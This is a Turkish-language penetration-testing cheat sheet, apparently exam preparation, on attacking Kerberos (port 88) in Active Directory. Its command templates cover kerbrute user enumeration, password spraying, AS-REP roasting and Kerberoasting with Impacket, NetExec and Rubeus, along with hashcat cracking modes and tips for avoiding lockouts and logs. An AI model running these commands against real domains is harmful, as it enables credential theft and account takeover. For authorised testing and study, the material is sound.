FOOTHOLD Metodoloji Cheat-sheet
88

Kerberos

ad

Kerberos (88/tcp+udp) Domain Controller'in kalbidir. Kimlik dogrulama burada doner: kerbrute ile kullanici enumerasyonu ve password spray, AS-REP Roasting (preauth kapali hesaplar) ve Kerberoasting (SPN'li hesaplar) icin baslangic noktasi. Clock skew (saat farki) 5 dakikadan fazla olursa KRB_AP_ERR_SKEW alirsin.

┌──

Komutlar

kerbrute ✓ EXAM-SAFE
kerbrute userenum --dc {{DC_IP}} -d {{DOMAIN}} {{WORDLIST}}
Kerberos preauth ile gecerli domain kullanicilarini sessizce enumere et (4768/4625 log uretmez, kilitleme yapmaz). Gecerli kullanici 'VALID' doner. HackTricks - Kerberos / kerbrute userenum
kerbrute ✓ EXAM-SAFE
kerbrute passwordspray --dc {{DC_IP}} -d {{DOMAIN}} {{WORDLIST}} '{{PASS}}'
Tek parola ile bulunan kullanici listesine spray. Kilitleme politikasina dikkat (badPwdCount). Spray oncesi 'net accounts' / GPO lockout esigini ogren. HackTricks - Password Spraying / kerbrute passwordspray
netexec ✓ EXAM-SAFE
nxc smb {{DC_IP}} -u {{WORDLIST}} -p '{{PASS}}' --no-bruteforce --continue-on-success
NetExec ile SMB uzerinden password spray alternatifi. --no-bruteforce kullanici[i]<->parola[i] eslesmesi yerine tum kullanicilara tek parolayi dener; --continue-on-success ilk hit'te durmaz. WADComs / NetExec SMB spray
impacket ✓ EXAM-SAFE
impacket-GetNPUsers {{DOMAIN}}/ -dc-ip {{DC_IP}} -usersfile {{WORDLIST}} -no-pass -format hashcat -outputfile asrep.hashes
Kimliksiz AS-REP Roasting: preauth (DONT_REQ_PREAUTH) kapali hesaplari tara, AS-REP hash'ini hashcat formatinda al. Sonra hashcat -m 18200 ile kir. The Hacker Recipes - AS-REP Roasting / Impacket GetNPUsers
impacket ✓ EXAM-SAFE user
impacket-GetNPUsers {{DOMAIN}}/{{USER}}:{{PASS}} -dc-ip {{DC_IP}} -request -format hashcat -outputfile asrep.hashes
Kimlikli AS-REP Roasting: gecerli credential ile preauth-disabled tum hesaplarin AS-REP'lerini topla. The Hacker Recipes - AS-REP Roasting / Impacket GetNPUsers
impacket ✓ EXAM-SAFE user
impacket-GetUserSPNs {{DOMAIN}}/{{USER}}:{{PASS}} -dc-ip {{DC_IP}} -request -outputfile kerb.hashes
Kerberoasting: SPN tanimli servis hesaplarinin TGS-REP hash'lerini iste (RC4 -> hashcat -m 13100). Gecerli domain kullanicisi yeterli; clock skew icin DC ile saatini senkronize et. HackTricks - Kerberoasting / Impacket GetUserSPNs
netexec ✓ EXAM-SAFE user
nxc ldap {{DC_IP}} -u {{USER}} -p '{{PASS}} --kerberoasting kerb.out
NetExec ile tek komutta Kerberoastable SPN hesaplarini topla ve dosyaya yaz. NetExec Wiki - LDAP --kerberoasting
netexec ✓ EXAM-SAFE user
nxc ldap {{DC_IP}} -u {{USER}} -p '{{PASS}}' --asreproast asrep.out
NetExec ile AS-REP roastable hesaplari tek komutta topla. NetExec Wiki - LDAP --asreproast
rubeus ✓ EXAM-SAFE user
Rubeus.exe kerberoast /outfile:kerb.hashes /nowrap
Windows tarafi (domain'e join host) Kerberoasting. /nowrap hash'i tek satirda verir; AES kullanan hesaplar icin /rc4opsec ile downgrade'i degerlendir. HackTricks - Kerberoasting / Rubeus
rubeus ✓ EXAM-SAFE user
Rubeus.exe asreproast /format:hashcat /outfile:asrep.hashes /nowrap
Windows tarafi AS-REP Roasting, hashcat formatinda cikti. HackTricks - AS-REP Roasting / Rubeus
ntpdate ✓ EXAM-SAFE user
sudo ntpdate {{DC_IP}}
Clock skew duzeltmesi: Kerberos isteminden once Kali saatini DC ile senkronize et. 5 dk'dan fazla fark KRB_AP_ERR_SKEW / KRB_AP_ERR_TKT_NYV hatasi verir. HackTricks - Kerberos clock skew
faketime ✓ EXAM-SAFE user
sudo timedatectl set-ntp off; sudo rdate -n {{DC_IP}}
ntpdate yoksa rdate ile DC saatine ayarla. Alternatif: 'faketime' ile tek komutu DC saatinde calistirmak. HackTricks - Kerberos clock skew

Port 88 - Kerberos (Active Directory Kimlik Dogrulama)

Port 88, Domain Controller’in kimlik dogrulama motorudur. AD saldirilarinin cogu burada baslar: kullanici enumerasyonu, password spray, AS-REP Roasting ve Kerberoasting.

1. Prerequisite - Saat Senkronizasyonu (Clock Skew)

Kerberos zaman hassastir. Kali ile DC arasindaki fark 5 dakikayi gecerse KRB_AP_ERR_SKEW ya da KRB_AP_ERR_TKT_NYV alirsin. Herhangi bir Kerberos islemi (GetUserSPNs, GetNPUsers, getTGT) oncesi DC saatine senkronize ol. Bunu unutmak en sik karsilasilan OSCP hatasidir.

2. Enum - Kullanici Enumerasyonu

kerbrute userenum Kerberos preauth davranisini kullanir: gecersiz kullanici icin KDC_ERR_C_PRINCIPAL_UNKNOWN, gecerli kullanici icin farkli yanit doner. Bu yontem hesap kilitleme (lockout) yapmaz ve cogunlukla log uretmez, bu yuzden sessizdir. Cikan gecerli listeyi spray ve roasting icin temel olarak kullan.

3. Attack - Password Spray

Tek parolayi (mevsim+yil, sirket adi+yil gibi) tum kullanicilara dene. Onemli gotcha: domain lockout esigini asma. Spray oncesi mumkunse nxc smb {{DC_IP}} -u {{USER}} -p '{{PASS}}' --pass-pol ile politikayi ogren ve esigin altinda kal.

4. Attack - AS-REP Roasting

DONT_REQUIRE_PREAUTH bayragi acik hesaplar icin KDC, parola dogrulamasi olmadan sifreli AS-REP doner. Bu hash offline kirilir (hashcat -m 18200). Credential gerekmeyebilir (-no-pass ile sadece kullanici listesi yeterli). Bu, ad-asrep teknigiyle dogrudan baglantilidir.

5. Attack - Kerberoasting

SPN atanmis (genelde servis) hesaplari icin herhangi bir gecerli domain kullanicisi TGS-REP isteyebilir. RC4 ile sifreli bilet offline kirilir (hashcat -m 13100). Modern ortamda AES-only hesaplar -m 19700 gerektirir. Bu ad-kerberoast teknigine besler.

Gotchalar

  • Saat senkronizasyonunu her zaman once yap.
  • Spray’de lockout esigine dikkat (badPwdCount).
  • AES kullanan hesaplarda RC4 downgrade her zaman calismaz; Rubeus /rc4opsec//tgtdeleg secenekleri yardimci olabilir.
  • GetUserSPNs/GetNPUsers Kerberos hatasi verirse once skew, sonra DNS (DC_HOST cozumlemesi /etc/hosts) kontrol et.
┌──

İlgili teknikler

AS-REP RoastingKerberoastingPassword Spraying (Parola Püskürtme)AD Kullanici Enumerasyonu: kerbrute userenum, lookupsid, NetExec, username-anarchy, OWA/MailSniper
┌──

Kaynaklar

↗ HackTricks - Kerberoasting↗ HackTricks - AS-REP Roasting↗ The Hacker Recipes - Kerberos↗ NetExec Wiki - LDAP
0/15 set